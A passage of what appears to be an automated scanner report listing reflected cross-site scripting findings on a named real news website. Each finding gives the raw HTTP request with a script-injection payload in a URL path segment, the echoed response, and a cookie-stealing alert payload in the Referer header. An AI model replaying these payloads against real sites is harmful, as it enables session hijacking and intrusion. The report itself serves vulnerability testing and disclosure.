<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallerye3ac9\"><script>alert(1)</script>441c81ccd97/SmoothGallery/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.280. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c990"><script>alert(1)</script>1062e2d3ae1 was submitted in the REST URL parameter 4. This input was echoed as 1c990\"><script>alert(1)</script>1062e2d3ae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery1c990"><script>alert(1)</script>1062e2d3ae1/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:44 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery1c990\"><script>alert(1)</script>1062e2d3ae1/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.281. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba45"><script>alert(1)</script>288fa1eb525 was submitted in the REST URL parameter 5. This input was echoed as dba45\"><script>alert(1)</script>288fa1eb525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsdba45"><script>alert(1)</script>288fa1eb525/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsdba45\"><script>alert(1)</script>288fa1eb525/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.282. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd01"><script>alert(1)</script>e845298fba6 was submitted in the REST URL parameter 6. This input was echoed as dbd01\"><script>alert(1)</script>e845298fba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.jsdbd01"><script>alert(1)</script>e845298fba6 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.jsdbd01\"><script>alert(1)</script>e845298fba6'; }); return true;" >
...[SNIP]...

4.283. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b22"><script>alert(1)</script>617478328a6 was submitted in the REST URL parameter 1. This input was echoed as 18b22\"><script>alert(1)</script>617478328a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content18b22"><script>alert(1)</script>617478328a6/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:19:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:41 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content18b22\"><script>alert(1)</script>617478328a6/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.284. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc5ab"><script>alert(1)</script>856e2c5dba6 was submitted in the REST URL parameter 2. This input was echoed as fc5ab\"><script>alert(1)</script>856e2c5dba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsfc5ab"><script>alert(1)</script>856e2c5dba6/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsfc5ab\"><script>alert(1)</script>856e2c5dba6/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.285. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb1c"><script>alert(1)</script>67ed783e3fc was submitted in the REST URL parameter 3. This input was echoed as 3eb1c\"><script>alert(1)</script>67ed783e3fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery3eb1c"><script>alert(1)</script>67ed783e3fc/SmoothGallery/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:35 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery3eb1c\"><script>alert(1)</script>67ed783e3fc/SmoothGallery/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.286. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4896"><script>alert(1)</script>ad0bbe39789 was submitted in the REST URL parameter 4. This input was echoed as b4896\"><script>alert(1)</script>ad0bbe39789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryb4896"><script>alert(1)</script>ad0bbe39789/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:40 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryb4896\"><script>alert(1)</script>ad0bbe39789/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.287. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28111"><script>alert(1)</script>770bdc224d7 was submitted in the REST URL parameter 5. This input was echoed as 28111\"><script>alert(1)</script>770bdc224d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts28111"><script>alert(1)</script>770bdc224d7/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts28111\"><script>alert(1)</script>770bdc224d7/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.288. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8908f"><script>alert(1)</script>1817db57aa4 was submitted in the REST URL parameter 6. This input was echoed as 8908f\"><script>alert(1)</script>1817db57aa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js8908f"><script>alert(1)</script>1817db57aa4 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:43 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js8908f\"><script>alert(1)</script>1817db57aa4'; }); return true;" >
...[SNIP]...

4.289. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 373cd"><script>alert(1)</script>3354bc166e1 was submitted in the REST URL parameter 1. This input was echoed as 373cd\"><script>alert(1)</script>3354bc166e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content373cd"><script>alert(1)</script>3354bc166e1/plugins/sociable/addtofavorites.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:53 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content373cd\"><script>alert(1)</script>3354bc166e1/plugins/sociable/addtofavorites.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.290. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353d7"><script>alert(1)</script>554ec6165a7 was submitted in the REST URL parameter 2. This input was echoed as 353d7\"><script>alert(1)</script>554ec6165a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins353d7"><script>alert(1)</script>554ec6165a7/sociable/addtofavorites.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins353d7\"><script>alert(1)</script>554ec6165a7/sociable/addtofavorites.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

